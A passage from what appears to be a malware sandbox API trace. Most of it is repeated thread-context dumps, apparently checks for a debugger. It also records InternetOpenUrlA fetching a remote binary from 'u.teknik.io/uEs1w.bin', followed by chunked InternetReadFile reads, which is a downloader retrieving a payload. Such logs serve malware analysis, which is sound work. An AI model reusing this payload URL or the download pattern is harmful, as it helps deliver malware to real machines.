[183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0113.428] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x2dfc84, dwBufferLength=0x4) returned 1 [0113.429] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://u.teknik.io/uEs1w.bin", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x80000000, dwContext=0x0) returned 0xcc000c [0126.702] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2550000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2550000*, lpdwNumberOfBytesRead=0x2dfc74*=0x10000) returned 1 [0126.720] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2560000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2560000*, lpdwNumberOfBytesRead=0x2dfc74*=0x10000) returned 1 [0126.778] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, 